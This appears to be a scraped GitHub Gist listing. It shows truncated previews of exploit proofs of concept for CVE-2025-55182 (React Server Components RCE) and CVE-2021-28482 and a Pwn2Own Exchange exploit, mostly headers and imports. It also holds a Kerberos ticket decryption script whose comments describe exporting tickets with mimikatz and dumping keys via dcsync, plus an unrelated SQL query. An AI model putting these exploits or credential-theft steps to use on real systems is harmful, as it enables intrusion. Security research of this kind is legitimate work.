Samas jtsamas
maple3142
/ CVE-2025-55182.http
Last active
December 6, 2025 10:55
CVE-2025-55182 React Server Components RCE POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST / HTTP/1.1 | |
| Host: localhost | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 | |
| Next-Action: x | |
| Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Length: 459 | |
| ------WebKitFormBoundaryx8jO2oVc6SWP3Sad | |
| Content-Disposition: form-data; name="0" |
rskvp93
/ Pwn2Own2021MSExchangeExploit.py
Created
June 21, 2022 03:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| import re | |
| import xml.dom.minidom | |
| import json | |
| import uuid | |
| import struct | |
| import string | |
| import random | |
| import hashlib | |
| import time |
irsdl
/ PoC_CVE-2021-28482.py
Created
September 7, 2021 21:15
— forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
xan7r
/ decryptKerbTicket.py
Last active
June 24, 2025 17:22
Decrypt kerberos tickets and parse out authorization data
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
| # Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
| # | |
| # Recommended Instructions: | |
| # Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
| # Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
| # Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
| # Run this script to decrypt: | |
| # ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected] |
OllieJones
/ fullquery
Last active
September 25, 2023 14:09
Fast nearest-location finder for SQL (MySQL, PostgreSQL, SQL Server)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SELECT zip, primary_city, | |
| latitude, longitude, distance | |
| FROM ( | |
| SELECT z.zip, | |
| z.primary_city, | |
| z.latitude, z.longitude, | |
| p.radius, | |
| p.distance_unit | |
| * DEGREES(ACOS(LEAST(1.0, COS(RADIANS(p.latpoint)) | |
| * COS(RADIANS(z.latitude)) |